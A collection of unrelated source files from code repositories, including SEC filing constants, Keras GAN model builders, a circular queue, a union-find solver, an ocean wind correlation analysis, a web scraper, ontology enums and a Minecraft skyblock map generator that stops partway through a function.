FILING_NCSRS = 'n-csrs'
FILING_NLIQUID = 'n-liquid'
FILING_NMFP = 'n-mfp'
FILING_NPORT = 'nport'
FILING_NPORTP = 'nport-p'
FILING_NPORTEX = 'nport-ex'
FILING_NPX = 'n-px'
FILING_NQ = 'n-q'
FILING_NRSRO = 'nrsro'
FILING_PF = 'pf'
FILING_PILOT = 'pilot'
FILING_R31 = 'r31'
FILING_S1 = 's-1'
FILING_S11 = 's-11'
FILING_S20 = 's-20'
FILING_S3 = 's-3'
FILING_S4 = 's-4'
FILING_S6 = 's-6'
FILING_S8 = 's-8'
FILING_SBSE = 'sbse'
FILING_SBSEA = 'sbse-a'
FILING_SBSEBD = 'sbse-bd'
FILING_SBSEC = 'sbse-c'
FILING_SBSEW = 'sbse-w'
FILING_SCI = 'sci'
FILING_SD = 'sd'
FILING_SDR = 'sdr'
FILING_SE = 'se'
FILING_SF1 = 'sf-1'
FILING_SF3 = 'sf-3'
FILING_SIP = 'sip'
FILING_T1 = 't-1'
FILING_T2 = 't-2'
FILING_T3 = 't-3'
FILING_T4 = 't-4'
FILING_T6 = 't-6'
FILING_TA1 = 'ta-1'
FILING_TA2 = 'ta-2'
FILING_TAW = 'ta-w'
FILING_TCR = 'tcr'
FILING_TH = 'th'
FILING_WBAPP = 'wb-app'
|
StarcoderdataPython
|
6551062
|
#%%
import tensorflow as tf
import tensorflow.keras as K
from tensorflow.keras import layers
#%%
def build_encoder(PARAMS):
x = layers.Input((PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']))
dims = [8, 16, 32, 64]
skip = x
for i in range(PARAMS['n_layer']):
skip = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 2, padding = 'same')(skip)
skip = layers.BatchNormalization()(skip)
skip = layers.LeakyReLU(0.2)(skip)
h = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 1, padding = 'same')(skip)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
# h = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 1, padding = 'same')(h)
# h = layers.BatchNormalization()(h)
# h = layers.LeakyReLU(0.2)(h)
skip = h + skip
mean = layers.Dense(PARAMS['latent_dim'])(layers.Flatten()(skip))
logvar = layers.Dense(PARAMS['latent_dim'])(layers.Flatten()(skip))
E = K.models.Model(x, [mean, logvar])
# E.summary()
return E
#%%
def build_generator(PARAMS):
z = layers.Input(PARAMS['latent_dim'])
y = layers.Input(PARAMS['class_num'])
hy = layers.Dense(4, use_bias=False)(y)[..., tf.newaxis]
hy = tf.matmul(hy, hy, transpose_b=True)[..., tf.newaxis]
h = layers.Reshape((4, 4, 16))(z)
h = layers.Concatenate()([h, hy])
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
dims = [128, 64, 32]
skip = h
for i in range(3):
skip = layers.Conv2DTranspose(filters = dims[i], kernel_size = 5, strides = 2, padding = 'same', use_bias=False)(skip)
skip = layers.BatchNormalization()(skip)
skip = layers.ReLU()(skip)
h = layers.Conv2D(filters = dims[i], kernel_size = 5, strides = 1, padding = 'same', use_bias=False)(skip)
h = layers.BatchNormalization()(h)
h = layers.ReLU()(h)
# h = layers.Conv2D(filters = dims[i], kernel_size = 5, strides = 1, padding = 'same', use_bias=False)(h)
# h = layers.BatchNormalization()(h)
# h = layers.ReLU()(h)
skip = h + skip
h = layers.Conv2DTranspose(3, (5, 5), strides=1, padding='same', use_bias=False, activation='tanh')(skip)
G = K.models.Model([z, y], h)
# G.summary()
return G
#%%
# def build_generator(PARAMS):
# z = layers.Input(PARAMS['latent_dim'])
# y = layers.Input((PARAMS['class_num']))
# hz = layers.Dense(PARAMS['latent_dim'], input_shape = [PARAMS['latent_dim']])(z)
# hz = layers.LeakyReLU(0.2)(hz)
# hz = layers.Dense(PARAMS['latent_dim'], input_shape = [PARAMS['latent_dim']])(hz)
# hz = layers.LeakyReLU(0.2)(hz)
# hy = layers.Dense(PARAMS['latent_dim'])(y)
# hy = layers.LeakyReLU(0.2)(hy)
# h = layers.Dense(512)(layers.Concatenate()([hz, hy]))
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(1024)(layers.Concatenate()([h, hy]))
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(3072, activation='sigmoid')(layers.Concatenate()([h, hy]))
# h = tf.reshape(h, [-1, PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
# # h = tf.reshape(h, [-1, 8, 8, 32])
# # h = layers.Conv2D(filters = 32, kernel_size = 3, padding = 'same')(h)
# # h = layers.LeakyReLU(0.2)(h)
# # h = layers.UpSampling2D(size=(2, 2), interpolation='bilinear')(h)
# # h = layers.Conv2D(filters = 16, kernel_size = 3, padding = 'same')(h)
# # h = layers.LeakyReLU(0.2)(h)
# # h = layers.UpSampling2D(size=(2, 2), interpolation='bilinear')(h)
# # h = layers.Conv2D(filters = 3, kernel_size = 1, activation='sigmoid', padding = 'same')(h)
# G = K.models.Model([z, y], h)
# # G.summary()
# return G
#%%
def build_discriminator(PARAMS):
x = layers.Input([PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
h = layers.Conv2D(filters = 64, kernel_size = 5, strides = 2, padding = 'same')(x)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Conv2D(filters = 128, kernel_size = 5, strides = 2, padding = 'same')(h)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Conv2D(filters = 256, kernel_size = 5, strides = 2, padding = 'same')(h)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Flatten()(h)
dis = layers.Dense(1, activation='sigmoid')(h)
cls = layers.Dense(PARAMS['class_num'], activation='softmax')(h)
D = K.models.Model(inputs = x, outputs = [dis, cls])
# D.summary()
return D
#%%
# def build_image_classifier(PARAMS):
# x = layers.Input([PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
# # h = layers.Conv2D(filters = 8, kernel_size = 3, strides = 2, padding = 'same')(x)
# # h = layers.LeakyReLU(0.2)(h)
# h = layers.Flatten()(x)
# h = layers.Dense(1024)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(512)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(128)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(PARAMS['class_num'], activation='softmax')(h)
# D = K.models.Model(inputs = x, outputs = h)
# # D.summary()
# return D
#%%
def build_z_discriminator(PARAMS):
x = layers.Input([PARAMS['latent_dim']])
h = layers.Dense(1024)(x)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(512)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(256)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(128)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(64)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(1, activation='sigmoid')(h)
D = K.models.Model(inputs = x, outputs = h)
# D.summary()
return D
#%%
|
StarcoderdataPython
|
65040
|
<reponame>smartx-jshan/Coding_Practice<gh_stars>0
class MyCircularQueue:
def __init__(self, k: int):
self.q = [None] * k
self.maxlen = k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.q[self.rear] is None:
self.q[self.rear] = value
self.rear = (self.rear + 1 ) % self.maxlen
return True
return False
def deQueue(self) -> bool:
if self.front == self.rear and self.q[self.front] is None:
return False
self.q[self.front] = None
self.front = (self.front +1) % self.maxlen
return True
def Front(self) -> int:
if self.q[self.front] is None:
return -1
return self.q[self.front]
def Rear(self) -> int:
if self.q[self.rear -1] is None:
return -1
return self.q[self.rear-1]
def isEmpty(self) -> bool:
if self.front == self.rear and self.q[self.rear] is None:
return True
return False
def isFull(self) -> bool:
if self.front == self.rear and self.q[self.rear] is not None:
return True
return False
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
# param_4 = obj.Rear()
# param_5 = obj.isEmpty()
# param_6 = obj.isFull()
|
StarcoderdataPython
|
11243665
|
import typing
class UnionFind():
def __init__(
self,
n: int,
) -> typing.NoReturn:
self.__a = [-1] * n
def find(
self,
u: int,
) -> int:
a = self.__a
if a[u] < 0: return u
a[u] = self.find(a[u])
return a[u]
def unite(
self,
u: int,
v: int,
) -> typing.NoReturn:
u = self.find(u)
v = self.find(v)
if u == v: return
a = self.__a
if a[u] > a[v]: u, v = v, u
a[u] += a[v]
a[v] = u
def same(
self,
u: int,
v: int,
) -> bool:
return self.find(u) == self.find(v)
def solve(
n: int,
uv1: typing.List[typing.Iterator[int]],
uv2: typing.List[typing.Iterator[int]],
) -> typing.NoReturn:
uf1 = UnionFind(n)
uf2 = UnionFind(n)
for u, v in uv1:
uf1.unite(u, v)
for u, v in uv2:
uf2.unite(u, v)
res = []
for i in range(n - 1):
for j in range(i + 1, n):
if uf1.same(i, j) or uf2.same(i, j):
continue
uf1.unite(i, j)
uf2.unite(i, j)
res.append((i + 1, j + 1))
print(len(res))
for x in res:
print(*x)
def main() -> typing.NoReturn:
n, m1, m2 = map(int, input().split())
uv1 = [
map(lambda x: int(x) - 1, input().split())
for _ in range(m1)
]
uv2 = [
map(lambda x: int(x) - 1, input().split())
for _ in range(m2)
]
solve(n, uv1, uv2)
main()
|
StarcoderdataPython
|
82714
|
<gh_stars>0
#!/usr/bin/env
"""
GOA_Winds_StormPatterns.py
Compare Gorepoint/globec winds (along shore) to telleconnection indices
GorePoint - 58deg 58min N, 150deg 56min W
and Globec3 59.273701N, 148.9653W
Files are created by GOA_Winds_NARR_model_prep.py
-Filtered NARR winds with a triangular filter (1/4, 1/2, 1/4) and output every 3hrs
-Provided U, V
-Saved in EPIC NetCDF standard
"""
#System Stack
import datetime
import sys
#Science Stack
import numpy as np
from scipy import stats
# User Stack
from utilities import ncutilities as ncutil
# Visual Stack
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter, MonthLocator
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__created__ = datetime.datetime(2014, 04, 29)
__modified__ = datetime.datetime(2014, 04, 29)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NARR','GLOBEC3', 'Gorept','AO/NAO/PNA', 'U,V','Winds', 'Gulf of Alaska'
"""------------------------General Modules-------------------------------------------"""
def from_netcdf(infile):
""" Uses ncreadfile_dic which returns a dictionary of all data from netcdf"""
###nc readin/out
nchandle = ncutil.ncopen(infile)
params = ncutil.get_vars(nchandle) #gets all of them
ncdata = ncutil.ncreadfile_dic(nchandle, params)
ncutil.ncclose(nchandle)
return (ncdata, params)
def date2pydate(file_time, file_time2=None, file_flag='EPIC'):
""" Ingest EPIC date or NCEP Date and provide python serial date"""
if file_flag == 'EPIC':
ref_time_py = datetime.datetime.toordinal(datetime.datetime(1968, 5, 23))
ref_time_epic = 2440000
offset = ref_time_epic - ref_time_py
try: #if input is an array
python_time = [None] * len(file_time)
for i, val in enumerate(file_time):
pyday = file_time[i] - offset
pyfrac = file_time2[i] / (1000. * 60. * 60.* 24.) #milliseconds in a day
python_time[i] = (pyday + pyfrac)
except:
pyday = file_time - offset
pyfrac = file_time2 / (1000. * 60. * 60.* 24.) #milliseconds in a day
python_time = (pyday + pyfrac)
elif file_flag == 'NARR':
""" Hours since 1800-1-1"""
base_date=datetime.datetime.strptime('1800-01-01','%Y-%m-%d').toordinal()
python_time = file_time / 24. + base_date
elif file_flag == 'NCEP':
""" Hours since 1800-1-1"""
base_date=datetime.datetime.strptime('1800-01-01','%Y-%m-%d').toordinal()
python_time = file_time / 24. + base_date
elif file_flag == 'Index':
""" yyyy mm dd"""
python_time=datetime.datetime.strptime(file_time,'%Y %m %d').toordinal()
else:
print "time flag not recognized"
sys.exit()
return python_time
"""------------------------- MATH Modules -------------------------------------------"""
def hourly_2_ave(ltbound,utbound, time, data, time_base=6.):
""" bin average times into specified bins """
interval = time_base / 24.
tarray = np.arange(ltbound, utbound,interval)
dmean = np.zeros_like(tarray) * np.nan
dstd = np.zeros_like(tarray) * np.nan
for i, val in enumerate(tarray):
ind = (time >= val) & (time < val+interval)
dmean[i] = data[ind].mean()
dstd[i] = data[ind].std()
return { 'dtime':tarray, 'dmean':dmean ,'dstd':dstd,}
def rotate_coord(angle_rot, mag, direct):
""" converts math coords to along/cross shelf.
+ onshore / along coast with land to right (right handed)
- offshore / along coast with land to left
Todo: convert met standard for winds (left handed coordinate system
"""
direct = direct - angle_rot
along = mag * np.sin(np.deg2rad(direct))
cross = mag * np.cos(np.deg2rad(direct))
return (along, cross)
def lin_fit(x, y):
""" scipy linear regression routine"""
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
return ( slope, intercept, r_value, p_value, std_err )
def moving_average(x, n, type='simple'):
"""
compute an n period moving average.
type is 'simple' | 'exponential'
"""
#x = np.asarray(x)
if type=='simple':
weights = np.ones(n)
else:
weights = np.exp(np.linspace(-1., 0., n))
weights /= weights.sum()
a = np.convolve(x, weights, mode='full')[:len(x)]
a[:n] = a[n]
return a
"""------------------------- Main Modules -------------------------------------------"""
### READ AO/PNA indices from txt file
AO_file = '/Users/bell/Data_Local/teleconnections/norm.daily.ao.index.b500101.current.ascii'
PNA_file = '/Users/bell/Data_Local/teleconnections/norm.daily.pna.index.b500101.current.ascii'
# ingest indicies
PNA_index, PNA_time = [], [] #some missing ind
with open(PNA_file, 'rb') as f:
for k, line in enumerate(f.readlines()):
PNA_index = PNA_index + [line.strip().split()[-1]]
PNA_time = PNA_time + [date2pydate(" ".join(line.strip().split()[:-1]), file_flag='Index')]
PNA_index= np.array(PNA_index, float)
PNA_time= np.array(PNA_time)
AO_index, AO_time = [], [] #some missing ind
with open(AO_file, 'rb') as f:
for k, line in enumerate(f.readlines()):
AO_index = AO_index + [line.strip().split()[-1]]
AO_time = AO_time + [date2pydate(" ".join(line.strip().split()[:-1]), file_flag='Index')]
AO_index= np.array(AO_index, float)
AO_time= np.array(AO_time)
### NARR wind files (preprocessed) for specific locations - winds have a triangle filter on them
NARR = '/Users/bell/Programs/Python/FOCI_Analysis/GOA_Winds/data/'
station_name = ['Globec3','GorePt']
sta_lat = [59.273701,58.9666666666666667]
sta_long = [148.9653,150.9333333333333333]
#loop over all requested data
years = range(1984, 2014,1)
NARR_time = []
NARR_uwnd = []
NARR_vwnd = []
for iyear in years:
globec3_data, NARRkeys = from_netcdf(NARR+'NARR_globec_'+str(iyear)+'.nc')
NARR_time = NARR_time + date2pydate(globec3_data['time'], globec3_data['time2'])
NARR_uwnd = np.append(NARR_uwnd, globec3_data['WU_422'][:,0,0,0])
NARR_vwnd = np.append(NARR_vwnd, globec3_data['WV_423'][:,0,0,0])
NARR_time = np.array(NARR_time)
### daily averages
time_bin = 24.
NARRDaily_uwnd = hourly_2_ave(NARR_time.min(),NARR_time.max(), NARR_time, NARR_uwnd, time_base=time_bin)
NARRDaily_vwnd = hourly_2_ave(NARR_time.min(),NARR_time.max(), NARR_time, NARR_vwnd, time_base=time_bin)
NARR_wndmag = np.sqrt((NARRDaily_uwnd['dmean']**2)+(NARRDaily_vwnd['dmean']**2))
NARR_wind_dir_math = np.rad2deg(np.arctan2(NARRDaily_vwnd['dmean'] , NARRDaily_uwnd['dmean']))
NARR_along,NARR_across = rotate_coord(120., NARR_wndmag, NARR_wind_dir_math)
"""----"""
# Calculate correlations for 3month spans
corr_PNA = {}
corr_AO = {}
for drange in range(1980,2014,1):
for mrange in range(1,12,3):
start_ind = datetime.datetime.strptime(str(drange) + ' ' + str(mrange) + ' 01','%Y %m %d').toordinal()
end_ind = datetime.datetime.strptime(str(drange) + ' ' + str(mrange+2) + ' 01','%Y %m %d').toordinal()
PNA_ind = (PNA_time >= start_ind) & (PNA_time <= end_ind)
AO_ind = (AO_time >= start_ind) & (AO_time <= end_ind)
NARR_ind = (NARRDaily_uwnd['dtime'] >= start_ind) & (NARRDaily_uwnd['dtime'] <= end_ind)
# NARR_along_stand = (NARR_along - np.nanmean(NARR_along)) / np.nanstd(NARR_along)
# NARR_along_stand = (NARR_along - np.nanmin(NARR_along)) / (np.nanmax(NARR_along) - np.nanmin(NARR_along)) #actually normalized - ignor var name
# PNA_index_stand = (PNA_index - np.nanmean(PNA_index)) / (np.nanstd(PNA_index))
# PNA_index_stand = (PNA_index - np.nanmin(PNA_index)) / (np.nanmax(PNA_index) - np.nanmin(PNA_index)) #actually normalized - ignor var name
if not np.size(NARR_along[NARR_ind]) == 0:
#(slope, intercept, r_value, p_value, std_err) = lin_fit(NARR_along_stand[NARR_ind], PNA_index[PNA_ind])
#corr[start_ind] = r_value**2
corr_PNA[start_ind] = np.corrcoef(NARR_along[NARR_ind], PNA_index[PNA_ind])[0][1]
corr_AO[start_ind] = np.corrcoef(NARR_along[NARR_ind], AO_index[PNA_ind])[0][1]
else:
corr_PNA[start_ind] = 0.0
corr_AO[start_ind] = 0.0
# 30day running filter for wind timeseries
NARR_along_rm = moving_average(NARR_along,(30))
AO_index_rm = moving_average(AO_index,(30))
PNA_index_rm = moving_average(PNA_index,(30))
"""------------------------- Plotting Modules -------------------------------------------"""
year_bounds = [[datetime.datetime.strptime('1980 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1985 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1990 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1995 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2000 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2005 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2010 01 01','%Y %m %d').toordinal()],
[datetime.datetime.strptime('1985 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1990 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1995 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2000 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2005 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2010 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2015 01 01','%Y %m %d').toordinal()]]
fig = plt.figure()
for splot in range(0,7,1):
ax1 = plt.subplot(7,1,splot+1)
plt.plot(NARRDaily_uwnd['dtime'], NARR_along_rm, 'r')
for i,kk in enumerate(corr_PNA.keys()):
if (corr_PNA[kk]) >=.2 and (corr_PNA[kk]) <=.3:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.1)
elif (corr_PNA[kk]) >=.3 and (corr_PNA[kk]) <=.4:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.3)
elif (corr_PNA[kk]) >=.4 and (corr_PNA[kk]) <=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.5)
elif (corr_PNA[kk]) >=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.8)
elif (corr_PNA[kk]) <=-0.2 and (corr_PNA[kk]) >=-0.3:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.1)
elif (corr_PNA[kk]) <=-0.3 and (corr_PNA[kk]) >=-0.4:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.3)
elif (corr_PNA[kk]) <=-0.4 and (corr_PNA[kk]) >=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.5)
elif (corr_PNA[kk]) <=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.8)
ax1.set_ylim((-10,10))
ax2 = ax1.twinx()
plt.plot(PNA_time, PNA_index_rm, 'b')
ax2.xaxis.set_major_formatter(DateFormatter('%b %Y'))
ax2.set_ylim((-3,3))
ax2.set_xlim(year_bounds[0][splot],year_bounds[1][splot])
ax2.xaxis.set_major_locator(MonthLocator(bymonth=[3,10], bymonthday=1))
fig.suptitle('NARR Along-Shore Winds corr PNA Index at Globec3')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0]*2, DefaultSize[1]*2) )
plt.savefig('NARR_along_PNA_globec.png', bbox_inches='tight', dpi = (100))
plt.close()
fig = plt.figure()
for splot in range(0,7,1):
ax1 = plt.subplot(7,1,splot+1)
plt.plot(NARRDaily_uwnd['dtime'], NARR_along_rm, 'r')
for i,kk in enumerate(corr_AO.keys()):
if (corr_AO[kk]) >=.2 and (corr_AO[kk]) <=.3:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.1)
elif (corr_AO[kk]) >=.3 and (corr_AO[kk]) <=.4:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.3)
elif (corr_AO[kk]) >=.4 and (corr_AO[kk]) <=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.5)
elif (corr_AO[kk]) >=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.8)
elif (corr_AO[kk]) <=-0.2 and (corr_AO[kk]) >=-0.3:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.1)
elif (corr_AO[kk]) <=-0.3 and (corr_AO[kk]) >=-0.4:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.3)
elif (corr_AO[kk]) <=-0.4 and (corr_AO[kk]) >=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.5)
elif (corr_AO[kk]) <=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.8)
ax1.set_ylim((-10,10))
ax2 = ax1.twinx()
plt.plot(AO_time, AO_index_rm, 'b')
ax2.xaxis.set_major_formatter(DateFormatter('%b %Y'))
ax2.set_ylim((-3,3))
ax2.set_xlim(year_bounds[0][splot],year_bounds[1][splot])
ax2.xaxis.set_major_locator(MonthLocator(bymonth=[3,10], bymonthday=1))
fig.suptitle('NARR Along-Shore Winds corr AO Index at Globec3')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0]*2, DefaultSize[1]*2) )
plt.savefig('NARR_along_AO_globec.png', bbox_inches='tight', dpi = (100))
plt.close()
|
StarcoderdataPython
|
6459651
|
<reponame>yanweiqiang/scrapingBook<gh_stars>0
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from bs4 import BeautifulSoup
myUrl = "http://www.pythonscraping.com/pages/page1.html"
def get_title(url):
title = ""
try:
html = urlopen(url)
bs = BeautifulSoup(html.read(), 'html5lib')
title = bs.h1
print(bs.h1)
print(bs.find('nonExistingTag').find('anotherTag'))
except HTTPError as e:
print(e)
except URLError as e:
print('The server could not be found!')
except AttributeError as e:
print('Tag was not found!')
else:
print('It worked!')
return title
print(get_title(myUrl))
|
StarcoderdataPython
|
5009976
|
<reponame>iamjavaexpert/Kamodo
import os, sys; sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from kamodo.kamodo import *
from kamodo.util import *
|
StarcoderdataPython
|
9605711
|
from enum import Enum
class HomologyTypes(Enum):
"""
Core homology relations from RO
"""
Ortholog = 'RO:HOM0000017'
LeastDivergedOrtholog = 'RO:HOM0000020'
Homolog = 'RO:HOM0000007'
Paralog = 'RO:HOM0000011'
InParalog = 'RO:HOM0000023'
OutParalog = 'RO:HOM0000024'
Ohnolog = 'RO:HOM0000022'
Xenolog = 'RO:HOM0000018'
class Evidence():
axiom_has_evidence = 'RO:0002612'
evidence_with_support_from = 'RO:0002614'
has_supporting_reference = 'SEPIO:0000124'
information_artefact = 'IAO:0000311'
_prefixmap = {
'SEPIO': 'http://purl.obolibrary.org/obo/SEPIO_',
'IAO': 'http://purl.obolibrary.org/obo/IAO_',
'IAO': 'RO://purl.obolibrary.org/obo/RO_',
}
class OboRO():
part_of = 'BFO:0000050'
occurs_in = 'BFO:0000066'
enabled_by = 'RO:0002333'
enables = 'RO:0002327'
involved_in = 'RO:0002331'
in_taxon = 'RO:0002162'
colocalizes_with = 'RO:0002325'
def map_legacy_pred(pred):
if '#' in pred:
lbl = pred.split('#')[-1]
if lbl == 'part_of':
return 'BFO:0000050'
if '_part_of' in lbl:
# for FMA
return 'BFO:0000050'
return pred
|
StarcoderdataPython
|
315977
|
from typing import Dict, List
import requests_cache
from afacinemas_scraper.core.cinemas import ScraperCinemas
from afacinemas_scraper.core.lancamentos import ScraperLancamentos
from afacinemas_scraper.core.precos import ScraperPrecos
requests_cache.install_cache(
"cache_afacinemas", backend="sqlite", expire_after=600
)
class Scraper:
def get_cinemas(self) -> List[Dict]:
sc = ScraperCinemas()
return sc.extract()
def get_proximos_lancamentos(self) -> List[Dict]:
sc = ScraperLancamentos()
return sc.extract()
def get_precos_ingressos(self, codigo: int):
sc = ScraperPrecos()
return sc.extract(codigo)
if __name__ == "__main__":
afa = Scraper()
cinemas = afa.get_cinemas()
proximos_lancamentos = afa.get_proximos_lancamentos()
print(afa.get_precos_ingressos(codigo=10))
|
StarcoderdataPython
|
373472
|
<gh_stars>1-10
#!/usr/bin/env python
import settings
from pymclevel import MCInfdevOldLevel
from pymclevel import TileEntity
try:
TileEntity.baseStructures['Control']
except KeyError:
from pymclevel import nbt
TileEntity.baseStructures['Control'] = (
('Command', nbt.TAG_String),
('LastOutput', nbt.TAG_String),
)
from pymclevel import TAG_Compound
from pymclevel import TAG_List
from pymclevel import TAG_Short
from pymclevel import TAG_Byte
from pymclevel import TAG_String
# from pymclevel.mclevelbase import ChunkNotPresent
from pymclevel.items import items
# So we can use relative figures and shift them all around slightly
base = 4
class LevelSlice(object):
'''
This allows interacting with a slice of the world without worrying about
chunk boundaries.
'''
# TODO: Try pre-loading all the chunks for the slice and compare that
# against loading on demand.
def __init__(self, level, east=0, south=0, up=64, radius=16):
'''
up defaults to 64 to allow vertical positions to be specified
relative to standard overworld sea level.
'''
self.level = level
self.east = east
self.south = south
self.up = up
self.radius = radius
self.chunks = {}
self.load()
def load(self):
min_east_chunk = (self.east - self.radius) // 16
max_east_chunk = (self.east + self.radius) // 16
min_south_chunk = (self.south - self.radius) // 16
max_south_chunk = (self.south + self.radius) // 16
for east_chunk in range(min_east_chunk, max_east_chunk + 1):
for south_chunk in range(min_south_chunk, max_south_chunk + 1):
self.chunks[east_chunk, south_chunk] = grabChunk(
self.level,
east_chunk,
south_chunk,
)
def save(self):
for chunk in self.chunks:
self.chunks[chunk].chunkChanged()
def empty(self):
self.set_blocks(
block_id=0,
minimum=(self.east - self.radius, self.south + self.radius),
maximum=(self.east - self.radius, self.south + self.radius),
)
def set_blocks(self,
block_id,
block_data=0,
minimum=None,
maximum=None,
):
# A very useful shorthand
if not minimum:
raise ValueError('set_blocks() requires a minimum point')
if not maximum:
raise ValueError('set_blocks() requires a maximum point')
if len(minimum) == 3:
min_east, min_south, min_up = minimum
elif len(minimum) == 2:
min_east, min_south = minimum
min_up = 0
else:
raise ValueError('set_blocks() received an invalid minimum point')
if len(maximum) == 3:
max_east, max_south, max_up = maximum
elif len(minimum) == 2:
max_east, max_south = maximum
max_up = 255
else:
raise ValueError('set_blocks() received an invalid maximum point')
for chunk_east, chunk_south in self.chunks.keys():
chunk = self.chunks[chunk_east, chunk_south]
# Don't do anything if this chunk doesn't intersect the region
if min_east > chunk_east * 16 + 15 or max_east < chunk_east * 16:
continue
if (min_south > chunk_south * 16 + 15
or max_south < chunk_south * 16):
continue
# Normalize relative to this chunk
c_min_east = min_east % 16
c_max_east = max_east % 16
c_min_south = min_south % 16
c_max_south = max_south % 16
if min_east < chunk_east * 16:
c_min_east = 0
if max_east > chunk_east * 16 + 15:
c_max_east = 15
if min_south < chunk_south * 16:
c_min_south = 0
if max_south > chunk_south * 16 + 15:
c_max_south = 15
chunk.Blocks[
c_min_east:c_max_east + 1,
c_min_south:c_max_south + 1,
min_up:max_up + 1,
] = block_id
chunk.Data[
c_min_east:c_max_east + 1,
c_min_south:c_max_south + 1,
min_up:max_up + 1,
] = block_data
def add_entity(self, entity, position):
east, south, up = position
chunk_east = east // 16
chunk_south = south // 16
if not (chunk_east, chunk_south) in self.chunks:
raise KeyError('position not in world slice: {}'.format(position))
chunk = self.chunks[chunk_east, chunk_south]
TileEntity.setpos(entity, (east, up, south))
chunk.TileEntities.append(entity)
def main():
# Set random_seed explicitly just to avoid randomness
print('Creating level.')
level = MCInfdevOldLevel(settings.output_filename,
create=True,
random_seed=1)
overworld = level
# Superflat: version 2, one layer of air, deep ocean biome
overworld.root_tag['Data']['generatorName'] = TAG_String(u'flat')
overworld.root_tag['Data']['generatorOptions'] = TAG_String(u'2;0;24;')
nether = level.getDimension(-1)
the_end = level.getDimension(1)
if settings.creative:
level.GameType = level.GAMETYPE_CREATIVE
# overworld
print('Generating overworld.')
create_empty_chunks(overworld, radius=15)
dirt_island(overworld, 0, 0)
sand_island(overworld, -3, 0)
bedrock_island(overworld, 50, -20)
spawn_island(overworld, 1000000, 1000000)
biomify(overworld)
# nether
print('Generating nether.')
nether_radius = 64 # 1 km to mainland
create_empty_chunks(nether, radius=nether_radius)
create_bedrock_fence(nether, radius=nether_radius)
soul_sand_island(nether, 0, 0)
# the_end
# Manually creating the_end does NOT spawn an ender dragon, so I don't
# need to figure out how to remove it.
print('Generating the end.')
create_empty_chunks(the_end, radius=20)
obsidian_island(the_end, 6, 0)
portal_island(the_end, 4, 0)
print('Finalizing and saving.')
level.generateLights()
level.saveInPlace()
def item_stack(item):
item_tag = TAG_Compound()
item_tag.name = 'tag'
item_tag['id'] = TAG_Short(item['id'])
item_tag['Damage'] = TAG_Short(item['damage'])
item_tag['Count'] = TAG_Byte(item['count'])
item_tag['Slot'] = TAG_Byte(item['slot'])
return item_tag
def signed_book(title='', pages=[''], author='Skyblock CE'):
book_tag = TAG_Compound()
book_tag.name = 'tag'
